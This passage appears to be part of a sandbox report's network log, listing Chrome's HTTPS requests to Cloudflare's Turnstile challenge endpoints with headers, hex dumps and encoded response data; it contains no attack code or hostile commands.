                                                                                  2025-01-15 01:58:32 UTC1369INData Raw: 75 66 56 68 79 6e 6e 71 68 64 58 65 51 67 5a 70 36 6d 4a 2b 66 6e 6d 75 4a 5a 49 70 73 74 6d 39 79 61 71 69 79 6d 6e 61 39 6a 4c 2b 4d 6c 37 46 31 70 5a 61 59 73 49 57 6b 74 6f 53 35 6e 63 7a 44 69 62 75 64 6e 71 71 48 73 4b 53 58 7a 61 66 54 71 72 32 55 79 39 62 69 32 65 4b 75 74 74 50 46 34 75 72 41 30 36 79 6e 71 75 71 35 77 65 76 6b 37 37 33 51 36 72 6a 72 78 38 33 4a 30 4c 54 55 7a 74 37 37 2b 50 54 35 34 4f 54 6c 30 75 44 56 31 65 55 4f 2b 4d 2f 4a 43 2b 6e 7a 43 74 49 50 32 41 73 47 30 76 76 70 38 2f 72 70 38 41 73 4d 46 78 38 52 41 77 63 57 46 66 37 35 4b 75 63 6f 47 76 34 65 41 53 44 79 49 53 6b 4f 4f 79 58 32 43 53 77 51 48 52 55 77 45 7a 41 6d 4f 54 67 57 47 52 6b 2b 4f 52 6f 48 46 77 6c 4a 54 7a 73 52 44 31 41 56 45 6a 68 57 56 43 34 64 57 68
                                                                                  Data Ascii: ufVhynnqhdXeQgZp6mJ+fnmuJZIpstm9yaqiymna9jL+Ml7F1pZaYsIWktoS5nczDibudnqqHsKSXzafTqr2Uy9bi2eKuttPF4urA06ynquq5wevk773Q6rjrx83J0LTUzt77+PT54OTl0uDV1eUO+M/JC+nzCtIP2AsG0vvp8/rp8AsMFx8RAwcWFf75KucoGv4eASDyISkOOyX2CSwQHRUwEzAmOTgWGRk+ORoHFwlJTzsRD1AVEjhWVC4dWh
                                                                                  2025-01-15 01:58:32 UTC1369INData Raw: 6d 4a 36 6f 59 49 6d 6d 65 47 69 41 64 35 79 48 62 32 71 4d 70 36 5a 79 6d 59 2b 6d 6b 71 6d 6f 6e 4c 65 36 6d 70 57 36 6c 6f 32 62 67 49 53 45 73 34 57 73 77 63 43 72 77 63 79 45 78 61 71 50 6e 72 62 4c 31 4d 61 57 31 71 37 62 79 35 2f 64 6f 4e 6e 41 74 71 4f 6d 30 61 66 62 37 4e 33 47 33 38 4c 66 77 2b 6a 4e 7a 39 43 77 34 39 66 70 74 74 58 49 39 66 4c 72 41 50 7a 68 2f 64 4b 39 39 51 54 30 30 51 50 68 2f 75 72 67 33 77 37 51 30 75 6f 44 34 42 55 4a 2b 4e 41 46 38 42 37 38 39 4e 38 57 48 41 30 4d 41 69 62 64 35 75 58 6d 4b 2f 34 41 35 69 30 63 4b 79 34 73 4b 51 66 75 46 66 41 32 47 42 67 36 47 53 63 7a 2b 6a 49 69 4d 44 6b 6d 46 78 78 47 49 7a 30 57 46 69 5a 42 50 31 42 4b 4d 55 41 6f 42 30 6b 66 57 42 4a 4e 46 53 6b 75 47 31 63 77 54 44 68 50 4f 31 42
                                                                                  Data Ascii: mJ6oYImmeGiAd5yHb2qMp6ZymY+mkqmonLe6mpW6lo2bgISEs4WswcCrwcyExaqPnrbL1MaW1q7by5/doNnAtqOm0afb7N3G38Lfw+jNz9Cw49fpttXI9fLrAPzh/dK99QT00QPh/urg3w7Q0uoD4BUJ+NAF8B789N8WHA0MAibd5uXmK/4A5i0cKy4sKQfuFfA2GBg6GScz+jIiMDkmFxxGIz0WFiZBP1BKMUAoB0kfWBJNFSkuG1cwTDhPO1B
                                                                                  2025-01-15 01:58:32 UTC1369INData Raw: 58 70 39 68 49 65 6d 61 36 31 7a 73 36 39 79 67 62 61 72 6d 33 4f 4a 64 72 64 38 74 72 4b 43 75 37 65 76 6d 70 71 4a 70 35 71 4b 7a 4b 79 58 76 73 61 72 68 62 48 4c 7a 4b 6a 41 75 74 54 5a 70 37 62 4a 79 64 66 4b 77 35 75 73 74 72 4f 6b 73 73 71 68 77 64 61 6a 36 38 62 6c 37 64 36 75 78 63 48 30 39 4f 72 53 37 2b 54 72 7a 2b 76 61 38 50 7a 2b 34 38 2f 53 39 50 54 42 30 77 6e 4b 32 38 6e 57 78 75 6a 63 45 65 66 79 43 65 51 49 43 50 4d 61 35 68 34 4d 46 76 6a 70 41 78 6a 77 47 68 4c 67 46 78 6b 55 43 76 55 57 44 2f 7a 34 38 42 37 73 4b 79 72 77 4d 69 51 6c 2b 52 58 33 45 6a 77 55 49 41 30 34 50 50 55 44 51 41 5a 49 42 55 59 65 49 79 70 4a 53 52 34 72 4b 53 67 76 54 54 45 53 53 68 42 56 55 56 51 64 55 30 6b 57 59 6b 42 4c 52 56 4d 32 50 43 4e 44 59 6b 4a 49
                                                                                  Data Ascii: Xp9hIema61zs69ygbarm3OJdrd8trKCu7evmpqJp5qKzKyXvsarhbHLzKjAutTZp7bJydfKw5ustrOkssqhwdaj68bl7d6uxcH09OrS7+Trz+va8Pz+48/S9PTB0wnK28nWxujcEefyCeQICPMa5h4MFvjpAxjwGhLgFxkUCvUWD/z48B7sKyrwMiQl+RX3EjwUIA04PPUDQAZIBUYeIypJSR4rKSgvTTESShBVUVQdU0kWYkBLRVM2PCNDYkJI
                                                                                  2025-01-15 01:58:32 UTC1369INData Raw: 71 42 68 36 79 66 63 49 53 6b 76 48 71 62 72 70 6c 79 71 73 4b 62 74 62 65 68 78 5a 2b 34 67 70 76 41 6a 63 37 4a 79 36 2f 41 77 70 37 4f 71 64 54 4e 32 71 2f 55 76 64 58 58 30 37 58 69 6e 4e 71 57 33 35 32 6c 76 72 47 36 79 37 37 6c 71 39 43 36 7a 73 6a 65 70 74 48 4d 7a 50 47 33 30 2f 4c 4d 78 66 71 35 76 76 67 43 75 62 72 41 76 41 6b 44 34 66 7a 38 43 38 54 73 36 39 41 45 44 74 48 4c 44 39 2f 33 30 76 58 34 45 65 34 63 48 4e 63 43 2b 64 7a 64 42 64 37 38 42 52 37 30 42 69 49 56 2b 53 66 73 2f 43 62 79 37 41 7a 30 44 7a 54 75 39 43 6b 63 47 54 34 52 2b 53 77 4b 50 78 77 78 52 42 6b 30 46 43 67 38 51 30 73 67 41 55 52 51 4d 68 31 4f 54 30 49 50 4e 30 31 44 53 69 39 53 4d 30 74 5a 47 79 6f 62 4c 45 35 45 48 6d 68 42 50 46 74 61 57 30 73 35 52 79 4e 49 50
                                                                                  Data Ascii: qBh6yfcISkvHqbrplyqsKbtbehxZ+4gpvAjc7Jy6/Awp7OqdTN2q/UvdXX07XinNqW352lvrG6y77lq9C6zsjeptHMzPG30/LMxfq5vvgCubrAvAkD4fz8C8Ts69AEDtHLD9/30vX4Ee4cHNcC+dzdBd78BR70BiIV+Sfs/Cby7Az0DzTu9CkcGT4R+SwKPxwxRBk0FCg8Q0sgAURQMh1OT0IPN01DSi9SM0tZGyobLE5EHmhBPFtaW0s5RyNIP
                                                                                  2025-01-15 01:58:32 UTC1369INData Raw: 31 74 33 4a 76 65 36 79 4b 6e 35 4b 75 73 37 57 6a 73 63 61 49 77 73 69 66 75 73 36 71 78 4c 75 52 72 71 69 66 72 37 2b 56 79 61 4f 30 6c 4c 36 35 32 36 6a 54 6e 62 32 31 7a 2b 53 38 76 4c 48 6d 70 61 72 6b 78 71 37 4c 76 65 44 6b 72 37 43 32 79 4d 48 69 32 66 50 36 32 2b 7a 51 2f 4d 6e 32 31 2f 58 39 2b 65 54 38 32 38 62 56 42 4d 6e 63 32 51 54 61 36 2f 44 4d 37 51 44 58 36 76 63 57 46 78 44 74 45 67 37 77 49 42 37 74 34 43 63 48 41 2f 44 37 48 75 49 45 44 68 73 51 4d 42 77 6b 49 67 49 6d 38 52 6b 4f 4f 53 6b 6f 2b 67 77 36 2f 42 77 78 2b 6a 4d 34 4e 78 55 65 47 30 52 45 4a 77 55 47 48 52 77 4e 49 30 45 68 53 30 49 34 45 7a 4a 51 4d 56 49 54 47 42 77 36 58 79 41 34 5a 55 49 67 59 6c 55 31 49 7a 35 44 53 56 6b 2b 51 43 4d 37 51 45 4a 30 5a 32 64 49 55 58
                                                                                  Data Ascii: 1t3Jve6yKn5Kus7WjscaIwsifus6qxLuRrqifr7+VyaO0lL6526jTnb21z+S8vLHmparkxq7LveDkr7C2yMHi2fP62+zQ/Mn21/X9+eT828bVBMnc2QTa6/DM7QDX6vcWFxDtEg7wIB7t4CcHA/D7HuIEDhsQMBwkIgIm8RkOOSko+gw6/Bwx+jM4NxUeG0REJwUGHRwNI0EhS0I4EzJQMVITGBw6XyA4ZUIgYlU1Iz5DSVk+QCM7QEJ0Z2dIUX
                                                                                  2025-01-15 01:58:32 UTC1369INData Raw: 63 37 4b 30 6b 6e 66 47 78 73 57 61 70 37 79 6f 7a 4b 61 64 6b 4b 2b 65 7a 73 75 6f 31 62 65 67 6b 34 79 72 72 35 6d 6d 6c 70 69 31 6f 4d 50 42 74 61 44 66 6f 4e 76 42 34 4f 53 6b 33 37 76 76 34 39 7a 54 35 72 43 73 31 65 2f 48 30 38 50 6c 79 65 7a 4c 36 38 48 35 41 4d 41 44 38 39 7a 66 31 39 6b 45 78 4e 73 50 42 4f 6a 4b 2f 73 2f 70 42 4f 51 49 42 4e 48 72 35 74 6a 6f 2b 39 72 39 46 68 6e 66 2f 52 51 65 49 78 63 59 46 43 77 4e 36 79 77 6b 48 2f 6e 37 4d 67 63 51 4c 68 44 78 41 6a 58 35 50 41 63 78 44 43 34 6a 2b 54 55 43 4e 52 56 44 52 55 41 2b 41 6b 4e 46 54 78 78 44 51 53 51 2b 52 31 63 7a 52 68 6c 4d 51 79 52 46 58 52 55 70 4f 69 41 56 4d 55 51 6c 56 54 67 67 57 43 4a 4e 52 30 4d 74 54 30 4d 36 4c 6e 46 7a 56 46 56 78 64 6b 39 61 62 33 6c 53 58 32 39
                                                                                  Data Ascii: c7K0knfGxsWap7yozKadkK+ezsuo1begk4yrr5mmlpi1oMPBtaDfoNvB4OSk37vv49zT5rCs1e/H08PlyezL68H5AMAD89zf19kExNsPBOjK/s/pBOQIBNHr5tjo+9r9Fhnf/RQeIxcYFCwN6ywkH/n7MgcQLhDxAjX5PAcxDC4j+TUCNRVDRUA+AkNFTxxDQSQ+R1czRhlMQyRFXRUpOiAVMUQlVTggWCJNR0MtT0M6LnFzVFVxdk9ab3lSX29
                                                                                  2025-01-15 01:58:32 UTC1369INData Raw: 35 33 48 71 4b 75 31 70 35 36 50 6d 73 69 39 7a 36 79 71 6e 73 50 41 71 4b 33 58 72 4b 71 2f 70 35 6d 73 6e 74 54 57 6c 38 37 6c 30 4c 62 5a 31 63 47 38 74 39 6e 46 70 38 76 54 33 4d 43 2f 7a 2b 4c 47 2b 4c 58 35 32 66 44 4a 33 4e 49 44 33 37 76 65 34 41 62 37 33 4f 54 6e 43 65 4c 61 33 38 7a 72 37 4f 7a 79 7a 2b 72 57 39 78 66 59 31 66 30 4e 37 2f 44 75 44 51 49 50 47 52 67 47 34 2b 59 56 35 43 73 68 48 50 30 62 4d 42 4d 6e 41 54 55 79 48 2b 33 71 43 42 59 61 4b 68 4d 48 46 78 4d 56 51 67 38 41 4d 78 48 35 41 55 49 45 4b 45 4e 41 50 79 56 4f 44 30 35 42 44 78 46 42 46 53 77 70 46 56 68 52 47 55 77 32 4f 55 4a 63 58 69 34 2b 4f 54 70 43 4d 6b 49 6a 61 79 63 71 54 32 6f 37 4d 6c 4a 4a 4d 6d 67 78 4b 7a 64 37 53 32 56 77 4e 54 6c 51 62 48 64 63 68 56 39 68
                                                                                  Data Ascii: 53HqKu1p56Pmsi9z6yqnsPAqK3XrKq/p5msntTWl87l0LbZ1cG8t9nFp8vT3MC/z+LG+LX52fDJ3NID37ve4Ab73OTnCeLa38zr7Ozyz+rW9xfY1f0N7/DuDQIPGRgG4+YV5CshHP0bMBMnATUyH+3qCBYaKhMHFxMVQg8AMxH5AUIEKENAPyVOD05BDxFBFSwpFVhRGUw2OUJcXi4+OTpCMkIjaycqT2o7MlJJMmgxKzd7S2VwNTlQbHdchV9h


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  13192.168.2.449769104.18.95.414438688C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-15 01:58:33 UTC597OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/58773639:1736903612:qJGc1e2dAaYtSb8S_Pl2oWagprYsbTE0u73qNtbBmWI/902242d8f9180f6d/aVfuuxLC46yOeh14YdFyp1RNJvO.5evD5Dx3tNm6VWg-1736906310-1.1.1.1-gHdCWsDgrEoUEe038cbis_E3mVHefnMgQL5Deg5vkmDY7fx6fF4wbzi0lfy3_HDa HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-15 01:58:33 UTC442INHTTP/1.1 400 Bad Request
                                                                                  Date: Wed, 15 Jan 2025 01:58:33 GMT
                                                                                  Content-Type: application/json
                                                                                  Content-Length: 14
                                                                                  Connection: close
                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                  cf-chl-out: 7j1xmyJO+7MgpD3zA59ve+7p+b0FEYPuRAkE/JstRVqSoKBSWHiSonWZt/qeGPPN0jPyV9KepcBRhPVt/F35eQ==$72yydCG53caVctP2rPvsHw==
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 902242e93a771861-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2025-01-15 01:58:33 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 33 30 7d
                                                                                  Data Ascii: {"err":100230}


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  14192.168.2.449770104.18.95.414438688C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-15 01:58:33 UTC782OUTGET /cdn-cgi/challenge-platform/h/b/i/902242d8f9180f6d/1736906312223/ImUa0poB2nYJac9 HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: image
                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/uz3u1/0x4AAAAAAA5OKIzF1t1zkHd6/auto/fbE/normal/auto/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-15 01:58:33 UTC200INHTTP/1.1 200 OK
                                                                                  Date: Wed, 15 Jan 2025 01:58:33 GMT
                                                                                  Content-Type: image/png
                                                                                  Content-Length: 61
                                                                                  Connection: close
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 902242ec6be24328-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2025-01-15 01:58:33 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 35 00 00 00 28 08 02 00 00 00 d1 cc 25 62 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                  Data Ascii: PNGIHDR5(%bIDAT$IENDB`


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  15192.168.2.449771104.18.95.414438688C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-15 01:58:34 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/902242d8f9180f6d/1736906312223/ImUa0poB2nYJac9 HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-15 01:58:34 UTC200INHTTP/1.1 200 OK
                                                                                  Date: Wed, 15 Jan 2025 01:58:34 GMT
                                                                                  Content-Type: image/png
                                                                                  Content-Length: 61
                                                                                  Connection: close
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 902242f14d814370-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2025-01-15 01:58:34 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 35 00 00 00 28 08 02 00 00 00 d1 cc 25 62 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                  Data Ascii: PNGIHDR5(%bIDAT$IENDB`


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  16192.168.2.449772104.18.95.414438688C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-15 01:58:34 UTC811OUTGET /cdn-cgi/challenge-platform/h/b/pat/902242d8f9180f6d/1736906312225/814d7182a35543fc036a8dc4b75eac522e4260df14e17dc604468f7fd5a74ad5/telJsXeRiKVnWIp HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: max-age=0
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/uz3u1/0x4AAAAAAA5OKIzF1t1zkHd6/auto/fbE/normal/auto/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-15 01:58:35 UTC143INHTTP/1.1 401 Unauthorized
                                                                                  Date: Wed, 15 Jan 2025 01:58:34 GMT
                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                  Content-Length: 1
                                                                                  Connection: close
                                                                                  2025-01-15 01:58:35 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 67 55 31 78 67 71 4e 56 51 5f 77 44 61 6f 33 45 74 31 36 73 55 69 35 43 59 4e 38 55 34 58 33 47 42 45 61 50 66 39 57 6e 53 74 55 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                  Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20ggU1xgqNVQ_wDao3Et16sUi5CYN8U4X3GBEaPf9WnStUAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                  2025-01-15 01:58:35 UTC1INData Raw: 4a
                                                                                  Data Ascii: J


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  17192.168.2.449773104.18.95.414438688C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-15 01:58:35 UTC1170OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/58773639:1736903612:qJGc1e2dAaYtSb8S_Pl2oWagprYsbTE0u73qNtbBmWI/902242d8f9180f6d/aVfuuxLC46yOeh14YdFyp1RNJvO.5evD5Dx3tNm6VWg-1736906310-1.1.1.1-gHdCWsDgrEoUEe038cbis_E3mVHefnMgQL5Deg5vkmDY7fx6fF4wbzi0lfy3_HDa HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  Content-Length: 32044
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  Content-type: application/x-www-form-urlencoded
                                                                                  CF-Chl-RetryAttempt: 0
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  CF-Challenge: aVfuuxLC46yOeh14YdFyp1RNJvO.5evD5Dx3tNm6VWg-1736906310-1.1.1.1-gHdCWsDgrEoUEe038cbis_E3mVHefnMgQL5Deg5vkmDY7fx6fF4wbzi0lfy3_HDa
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Origin: https://challenges.cloudflare.com
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/uz3u1/0x4AAAAAAA5OKIzF1t1zkHd6/auto/fbE/normal/auto/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-15 01:58:35 UTC16384OUTData Raw: 76 5f 39 30 32 32 34 32 64 38 66 39 31 38 30 66 36 64 3d 51 47 33 71 7a 4a 74 6f 43 25 32 62 47 53 47 53 49 47 74 57 74 2b 48 42 57 57 74 59 65 47 4a 48 74 66 53 59 42 24 57 53 69 2b 66 66 53 78 50 24 6f 74 59 74 6e 53 55 45 53 74 2b 74 38 48 71 69 4e 43 74 65 2b 53 37 50 4a 32 2b 5a 4b 41 43 53 46 53 74 47 74 24 53 74 50 65 69 53 51 4e 43 53 62 53 51 33 49 33 6e 2b 53 24 65 53 54 55 50 4a 68 53 56 42 74 61 45 42 66 53 41 2b 35 53 41 33 74 5a 53 24 35 30 49 49 57 53 53 65 43 53 35 6c 53 53 51 4b 33 2d 53 52 66 56 53 74 65 56 69 4b 47 2d 33 7a 50 53 4f 4b 35 79 57 5a 57 4e 6f 59 42 4b 69 4b 24 45 48 45 33 50 53 2b 65 6a 54 53 57 74 4a 74 69 50 53 33 65 45 33 71 7a 57 4f 2d 43 50 33 76 4d 79 74 48 48 4d 53 69 76 4d 5a 56 6d 44 34 42 4c 51 59 65 48 4b 50 68
                                                                                  Data Ascii: v_902242d8f9180f6d=QG3qzJtoC%2bGSGSIGtWt+HBWWtYeGJHtfSYB$WSi+ffSxP$otYtnSUESt+t8HqiNCte+S7PJ2+ZKACSFStGt$StPeiSQNCSbSQ3I3n+S$eSTUPJhSVBtaEBfSA+5SA3tZS$50IIWSSeCS5lSSQK3-SRfVSteViKG-3zPSOK5yWZWNoYBKiK$EHE3PS+ejTSWtJtiPS3eE3qzWO-CP3vMytHHMSivMZVmD4BLQYeHKPh
                                                                                  2025-01-15 01:58:35 UTC15660OUTData Raw: 35 61 2b 6a 7a 6e 42 4b 74 62 63 4d 63 6e 53 74 47 30 71 4a 33 53 48 53 24 71 64 61 4c 42 53 2b 45 57 71 41 2b 53 42 47 30 4f 53 30 53 6d 71 6c 71 55 65 53 57 47 46 71 53 57 74 45 53 53 4e 55 6e 74 70 53 41 6a 74 53 74 5a 53 41 42 55 49 74 34 53 48 61 30 2b 74 6d 53 64 50 4a 71 74 38 53 33 77 36 64 53 6b 42 53 48 55 45 6a 6c 65 6f 52 74 65 53 56 53 6e 42 41 33 41 6c 65 4a 71 6b 33 41 78 53 49 71 69 43 41 4f 53 58 71 51 43 41 58 53 4e 71 33 65 4a 4f 53 4d 71 6b 65 4a 67 53 62 71 52 65 4a 2d 53 75 71 51 47 41 68 53 38 71 33 57 4a 72 53 7a 71 2b 57 41 72 53 43 42 69 47 41 6c 53 4b 42 52 57 4a 4e 53 6e 42 78 6e 41 69 53 6a 42 51 6e 4a 30 53 72 42 78 48 4a 66 53 70 42 52 6e 41 75 53 58 6f 55 33 74 50 71 69 50 30 76 71 6b 50 55 71 69 53 74 77 65 74 53 53 49 53
                                                                                  Data Ascii: 5a+jznBKtbcMcnStG0qJ3SHS$qdaLBS+EWqA+SBG0OS0SmqlqUeSWGFqSWtESSNUntpSAjtStZSABUIt4SHa0+tmSdPJqt8S3w6dSkBSHUEjleoRteSVSnBA3AleJqk3AxSIqiCAOSXqQCAXSNq3eJOSMqkeJgSbqReJ-SuqQGAhS8q3WJrSzq+WArSCBiGAlSKBRWJNSnBxnAiSjBQnJ0SrBxHJfSpBRnAuSXoU3tPqiP0vqkPUqiStwetSSIS
                                                                                  2025-01-15 01:58:35 UTC322INHTTP/1.1 200 OK
                                                                                  Date: Wed, 15 Jan 2025 01:58:35 GMT
                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                  Content-Length: 26304
                                                                                  Connection: close
                                                                                  cf-chl-gen: /uYFlrBx3ZxDMIuqa+JsaJwQa+GNpUK5/ERFQUZEkcnOXGkQxameACOgl/3TtO7y$3D/WAesrN3I5zgIRqynejw==
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 902242f95d2843cd-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2025-01-15 01:58:35 UTC1047INData Raw: 6d 70 61 34 78 5a 2b 74 78 5a 71 39 69 38 57 63 78 38 6e 53 7a 70 57 72 6b 39 75 6d 32 74 62 66 71 74 36 35 71 71 4c 69 75 64 43 31 76 39 2f 61 75 36 61 73 37 4d 79 6f 76 73 54 4f 30 4d 32 75 34 4d 61 30 75 65 76 79 79 39 50 7a 75 39 66 56 38 64 58 38 77 64 54 68 2f 74 6a 4b 31 64 58 74 33 4e 72 49 36 51 33 38 34 4d 67 57 45 38 2f 6d 31 41 59 48 46 4e 33 65 37 4e 72 74 49 66 6e 37 42 74 34 64 36 42 59 64 36 65 34 66 41 41 77 53 46 51 6b 50 4b 54 58 32 47 53 34 37 4f 41 6b 49 4e 69 78 44 49 2f 6f 61 50 77 39 47 4d 52 34 69 46 53 4a 49 4f 67 78 4e 50 30 6f 72 4b 44 38 69 51 79 67 33 57 78 51 61 57 43 39 58 4d 6b 4a 67 4d 6c 35 69 55 6b 56 6b 58 30 49 37 4b 6c 35 67 5a 6b 4d 72 62 32 6f 31 63 6d 78 76 63 6e 74 63 61 32 31 30 59 48 5a 67 63 57 52 43 56 46 38
                                                                                  Data Ascii: mpa4xZ+txZq9i8Wcx8nSzpWrk9um2tbfqt65qqLiudC1v9/au6as7MyovsTO0M2u4Ma0uevyy9Pzu9fV8dX8wdTh/tjK1dXt3NrI6Q384MgWE8/m1AYHFN3e7NrtIfn7Bt4d6BYd6e4fAAwSFQkPKTX2GS47OAkINixDI/oaPw9GMR4iFSJIOgxNP0orKD8iQyg3WxQaWC9XMkJgMl5iUkVkX0I7Kl5gZkMrb2o1cmxvcntca210YHZgcWRCVF8
